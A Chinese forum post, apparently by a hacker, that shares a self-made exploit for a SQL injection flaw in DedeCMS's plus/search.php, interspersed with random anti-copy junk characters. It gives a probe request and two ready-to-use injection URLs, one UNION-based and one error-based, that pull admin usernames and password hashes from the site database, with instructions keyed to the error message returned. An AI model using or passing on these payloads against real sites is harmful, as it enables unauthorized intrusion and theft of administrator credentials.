转载不加作者名的没JJ
" C, o* K" `8 _; o! Q6 g( K7 d
9 P' [5 ^' z6 L6 P: _( X" r哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。0 {8 @( ?4 k. e" l' O. I) i* @# G
9 q( i; n1 W6 f
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。# l0 \6 {' ?0 n# u
4 Q: G9 c- C, M! j我一般是这样测试的:# ^/ v) g$ m* b/ u3 z& I4 S
# ~- e( {/ W1 L+ f) i2 k w
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a; z( C7 Z: T6 D" a$ _7 E, t
+ q& J( ~- p) o! r; R3 a转载不加作者名的没JJ& b& J( v) i3 B" _) u
4 y2 \2 R7 }( _. m B作者:鬼哥% z5 Z& E3 F7 V: L% ~
* F! V0 `0 l# O+ W1 v $ w# o# ]4 F, D; l I. L7 j' i
& [# E, U. a2 {2 z* p
看结果如果提示, G4 Y/ {$ S7 T% X- S
^0 w+ u, V4 O5 }Safe Alert: Request Error step 2 !% [+ L7 X' c; u) i q9 G) b- `
% N& v6 q/ Z+ w! ]! m% W那么直接用下面的exp9 ~5 S$ j6 M4 @3 A0 Z# w8 u
9 f3 n. r0 W1 b& Mxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a: G( n! ^. a: ^2 y' ]- R8 ~
5 o9 p3 v& c6 [5 l- }- }2 c/ i# _
A) A1 Z+ U% [
看结果如果提示: N' Q8 r) A8 D1 E) Q
$ X" c0 Z6 W; v! j# @, `0 ^
Safe Alert: Request Error step 1 !0 E! k6 b# s) [3 H$ ^
: j# C3 w& x0 t! W
那么直接用下面的exp
6 a* K2 T6 e$ N
( h- c/ t, M6 vxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a: q9 ?( D4 s% q9 v' r2 D, Y# t
, w8 I- y- }4 i* Q7 W( Y0 U9 ^: e6 c3 B3 C" |0 I9 ~1 l
如果正常显示证明漏洞不存在了。% b2 u# J( P1 x# }
5 e. M6 Q; R* y% m: _8 V转载不加作者名的没JJ |